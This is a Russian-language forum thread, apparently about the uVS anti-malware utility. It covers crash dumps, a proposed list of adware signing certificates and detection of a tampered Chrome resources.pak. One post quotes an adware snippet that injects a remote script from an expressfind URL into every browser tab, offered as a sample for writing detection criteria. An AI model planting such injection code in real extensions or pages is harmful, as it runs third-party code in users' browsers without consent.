Перейти к содержанию

Recommended Posts

Виктор Коляденко

Про заговор не знаю. Многие трояны додумались называть свои компоненты легальными программами и помещать себя в ту папку, что использует эта программа? Как пример - Program Files (x86)\Microsoft Office.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

@PR55.RP55,

Разные сертификаты ну и безалаберность.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

demkd    вот к примеру такая ситуация

необходимо поудалять несколько файлов разного плана : ярлык к программе , исполняемый фаил подозрительный , известный фаил без подписи и пр , пока это все удалишь по одному пол часа пройдет

предлагаю добавить стандартную виндовскую функцию:  добавить "ctrl + a" а также через зажатый "ctrl" добавлять\удалять из списка . после чего нажал del(или в контекстном меню выбрал удалить выбранное) и удалил оптом все что было выделено .

долбиться с критериями в данном случае нецелесообразно

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Аркалык

@demkd, Напишите краткую инструкцию, как создать дамп файл при падении uVS, что бы в дальнейшем понять, почему программа падает с ошибкой и решить эту проблему со всеми силами. Это уже немножко начал бесить (падение uVS), из 3 компьютеров, у одного компьютера обязательно имеется такая проблема и нет пути решений.

----------------------

Заметил еще такую схожесть: Если uVS падает при запуске с активной системы, тогда будет падать и при запуске с WinPE. Думаешь, что какой-то вирус мешает запуске программы и начинаешь запускать его из WinPE, он по любому будет закрываться. Значить проблема не в активном вирусе, а UVS не может отработать какой-то ключ в реестре (это мое мнение, может быть и не так).

---------------------

Еще одно замечание: Если uVS будет падать при запуске, тогда запускаем adwCleaner и после его чистки UVS запустится.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

@Аркалык,

Все просто, uVS сам создаст дамп при падении, всплывет окошко для отправки его мне.

Дампы принимаются только для актуальной версии.

Если дамп не отправился его можно отправить вручную мне на почту, файл вида uvsdump_3.****.dmp

Для WinPE да, обычно из каких-то ключей реестра.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Аркалык

@demkd, А этот автоматическое отправка дамп файла точно работает? Который раз падал uVS и не разу не видел дампа uVS в каталоге (откуда запускался uVS) или дамп файл находится в другом месте? Окошка о отправке данных при падений тоже не было (ни разу). Из WinPE всегда запускаю актуальную версию uVS со своими вирусными базами и критериями.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

да, работает, в день по 2-3 дампа приходит, но к старым версиям, я их не разбираю даже все одно и тоже идет для уже исправленных ошибок, смотрю только для новых, но к новым очень редко, ошибок меньше.

дамп создается всегда в каталоге запуска uVS.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Аркалык

@demkd, Можно сделать так, что бы при падений uVS, дамп файл хранился в каталоге и не удалялся, если даже автоматический отправился в сервер?

---------------

Это удобно для того, что бы точно следить за исследованием дамп файла и понять причину падение. А то не понятно, отправился ли отчет, иследуется ли проблема и т.д.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

@Аркалык,

а он автоматически и не отправляется, только если пользователь нажмет кнопку отправить и собственно отчет дойдет до сервера,

если нет то дамп останется в каталоге uVS

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Demkd

 

Что самое главное в uVS...

Это универсальнось програмы.

------------

В ряде случаев uVS в инфо. пишет:

 

"Сертификат аннулирован"

-------------

 

Как быстро это можно реализовать в программе ?

т.е.

Чтобы Оператор мог _сам подключить файл/ список аннулированных ЭЦП.

 

и видел в инфо.:  Сертификат аннулирован _оператором.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

@PR55.RP55,

это ничего полезного не даст, поскольку сертификаты отзывают достаточно оперативно, зато потребует массы времени и сил на реализацию.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Отзываются то они отзываются...
Только не все.
-----
И причины отзыва разные.
- А некоторые не отзываются и думаю отзваться не будут.
- У меня сейчас список из 500 ЭЦП и 90% из них не отозваны.
------
Ask.com
и т.д.

 

Я уже ранее выкладывал файл/список.

--------

А даст это многое.

1) Оператор подключает список ( в данном случае из 500 ЭЦП )

2) Создаёт критерий поиска для: " Сертификат аннулирован Оператором."

------

В итоге файл в подозрительных с вердиктом ?ВИРУС? = автоскрипт.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

Гигантская  экономия времени.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

RP55,

а смысл какой вот в этом дополнительном вердикте: сертификат аннулирован_оператором?

если ты добавил ЭЦП в критерий false.sgn, то ты таким образом его и "аннулировал" (хоть и не являешься удостоверяющим центром) вперед Микрософта.

и все объекты получат статус ?ВИРУС? и попадут под автоскрипт.

 

в чем здесь экономия времени?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

В Списке... 5 0 0

 

ЭЦП, а доживём будет и 1000.

-------

Кто сможет создать критерий из 5 0 0 элементов ?

Проверить его работоспособность...

Как с ним работать если еть ошибка - как его исправить ?

- Как это повлияет на скорость обработки данных - особенно на слабых PC...

-----

А как всем ясно.

Экономия времини:

Чтобы подключить файл/список из _любого числа ЭЦП ( хоть из 10 000 ) нужно 2 минуты времени.

А чтобы создать критерий даже из 500 ЭЦП - уйдёт неделя...

И без гарантии, что критерий будет работать.

- Можно ещё конечно создать 50 критерив и в каждый из них включать по 10-20 элементов.

Только вот с какой радости ?

-----------

А смысл в том, что нужно создать только _ОДИН_ критерий...

Этот:   " сертификат аннулирован_оператором

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

ну это из серии убрать список ЭЦП из критериев и добавить его в отдельный список.

трюк, только и всего.

никто не заставляет человека набивать критерий из 500 ЭЦП. я, например, добавляю по одному ЭЦП максимум 1 раз в день.

если будет возможность экспорта_отдельного критерия в файл _snms, то и необходимости в его набивке никакой нет.

тем, кто с нуля хочет создать этот критерий.

-------

а проверяется работоспособность критерия просто.

если объекты с данной ЭЦП детектируются критерием, то значит критерий работает.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

1) uVS  уже работает со списком аннулированных Сертификатов.
- Пусть _некоторые сертификаты оперативно аннулируются...
- Только зачем ждать неделю, если можно аннулировать сертификат на месте сразу = мгновенно.

2) Если человек _начинает работать с uVS  и работать на форуме, или в крупной фирме...
То, в каждом образе системе ему будет встречаться  по 1- 7 ЭЦП  ADWARE....
Которые _ему будет нужно зафиксировать = создать критерии поиска и это не по одному в день.

А по 40 !

И сколько на это у него уйдёт времени.

3) Высказывания:


потребует массы времени и сил на реализацию.



   

 

 

    я, например, добавляю по одному ЭЦП максимум 1 раз в день. 


Говорят только об одном.
Своё время всегда дорого.
 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

RP55,

 а какая проблема этому начинающему хелперу прийти на форум, и запросить базу критериев.

некоторые здесь так и делают, но их совсем немного.

и затем правят ее так как им вздумается.

-------

я исходу из правила Оккамы: если эта проблема уже отлажена и решается через snms, то нет необходимости создавать дополнительный лишний список (лишняя сущность), и писать лишние обработки.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

1) Нужно знать о чём спрашивать на форуме.
2) Использовать чужие критерии НЕ разумно - это слепое использование без понимания сути.
и может быть опасно.

3) Всё равно кто-то этот критерий/рии должен изначально создать = потратить как минимум неделю времени.
( но, видимо всем до этого нет дела )
-----
1) Есть файл ( сейчас 503 ЭЦП )
2) Этот файл помещается в каталог с uVS
3) Файл обрабатывается программой.
4) Обрабатывается список и файл получает вердикт: ПОДОЗРИТ.
---------

Я хочу  одного ...
Чтобы можно было взять файл/список из ХХХ  ЭЦП и подключить его в течении 2 минут.
И так же быстро в случае необходимости отредактировать.

А не сидеть сутками.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Виктор Коляденко

2) Этот файл помещается в каталог с uVS

 

Как его назвать (сейчас есть "по Adware.txt")? Список есть, его как-то можно добавить в базу?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Виктор Коляденко

 

Сейчас всё  ( предельно просто )

Есть файл/список из 503 ЭЦП.

Вот его нужно открыть...

Потом запустить uVS и сидеть по одному копировать из списка ЭЦП...

215 Apps
337 Technology Limited
ABDULKADIR SAHIN

 

и т.д  по 503 включимтельно.

Сидеть и создавать критерии поиска.

--------

И где то через неделю... Вы закончите.

Всё очень удобно и продумано.

----

Только вначале нужно зайти в аптеку и купить свечи ( для профилактики )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

AntiSMS

Версия 7.3 от 03.03.2015

Добавлены присланные сигнатуры известных загрузочных секторов.
Улучшена проверка и исправление ярлыков вредоносных программ.
Усовершенствован и ускорен алгоритм обработки чёрного списка.
Дополнен чёрный список производителей вредоносных программ.
Обновлён алгоритм подсчёта хэшей для лучшей совместимости.
Усовершенствована обработка скриптов и ярлыков.
Улучшено отображение записей CLSID в логах.

-----------

Вопрос такой: http://habrahabr.ru/post/255333/

uVS это найдёт и покажет или ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

@PR55.RP55,

нет и никто не покажет, в паке несколько предустановленных расширений хрома, цифровой подписи у пака нет, это Google т.е. сплошная дыра. Маскимум что я могу предложить так это добавить pak в список, а хэши все его 100500 вариантов уж вы самостоятельно собирайте в свою базу :D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

@PR55.RP55,

Маскимум что я могу предложить так это добавить pak в список.

 

А я хочу предложить следующее...

1)

 

В каталоге с uVS  положить оригинальный файл:  resources.pak

И по соответствующей команде заменять файл на файл.

По типу: uvs_v3.8\STORE

2)

 

   добавить pak в список   

 

В инфо.  .pak

Показывать кусок кода:

 

Типа:

chrome.tabs.onUpdated.addListener( function(tabId,changeInfo,tab){ chrome.tabs.executeScript(tabId,{code:" if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://expressfind-a.akamaihd.net/ExpressFind/cr?t=BLGC&g=ca4874d9-0a3e-4215-9772-67fb5ba1c08a'; document.head.appendChild(scr);} "})});

Чтобы можно было критерий поиска создать.

 

 

....

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

@PR55.RP55,

это бред, для какой версии файл то? :D

это проблема гугла, пусть подпись добавляют, что решит все проблемы.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • PR55.RP55
      Microsoft  в Win11 ( на канале Dev.) - добавила новую функцию, позволяющую получить полный список приложений, которые в последнее время запрашивали доступ к конфиденциальной информации, включая камеру, микрофон и контакты. Новая функция также отслеживает программы, получившие за последнюю неделю доступ к данным местоположения, телефонным звонкам, переписке и скриншотам. https://www.comss.ru/page.php?id=10641 Возможно функция (  или её дальнейшее развитие ) будут полезны.      
    • Vvvyg
      Ну, хоть что-то полезное на форуме появилось ) Почистил.
    • akoK
      А куда все разбежались? Зашел, а тут все спамом затянуто.
    • PR55.RP55
      По всей видимости uVS не всегда может получить доступ к: Hosts Нужно чтобы в Лог писалась информация: "Нет доступа  к Hosts " Вроде сейчас uVS  соответствующих записей не создаёт?
    • PR55.RP55
      " 12 апреля 2022 года компания Microsoft опубликовала информацию о новом вредоносном ПО под названием Tarrask. Угроза использует баг планировщика Windows, чтобы избежать обнаружения. " " Tarrask удаляет значение дескриптора безопасности (Security Descriptor, SD) задачи в реестре Windows, что приводит к исчезновению задачи из планировщика задач и из инструмента командной строки. " https://www.comss.ru/page.php?id=10384    
×